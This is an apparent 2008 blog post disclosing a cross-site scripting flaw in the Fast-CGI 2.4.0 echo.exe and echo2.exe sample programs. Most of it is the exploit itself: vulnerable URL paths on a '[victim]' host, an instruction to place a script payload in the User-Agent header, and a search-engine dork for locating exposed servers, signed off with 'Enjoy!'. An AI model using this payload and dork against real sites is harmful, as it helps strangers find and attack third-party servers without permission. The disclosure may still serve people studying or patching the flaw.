Sunday, September 14, 2008

Fast-Cgi <=2.4.0 echo.exe/echo2.exe XSS

This is an XSS bug that I found in the fast-cgi 2.4.0 echo/echo2 applications.
It happens because there is no data validation when the application prints the data.

Exploit:

##################################################
Fast-Cgi <=2.4.0 echo.exe/echo2.exe XSS
##################################################

echo.exe : http://[victim]/fcgi-bin/echo.exe
echo2.exe : http://[victim]/fcgi-bin/echo2.exe

Change the User-Agent to:

User-Agent: [XSS]

ex:

User-Agent: <script>alert("XSS");</script>

Dork: inurl:/fcgi-bin/echo
##################################################
by Juza, iamjuza [at] gmail.com
##################################################

Enjoy!
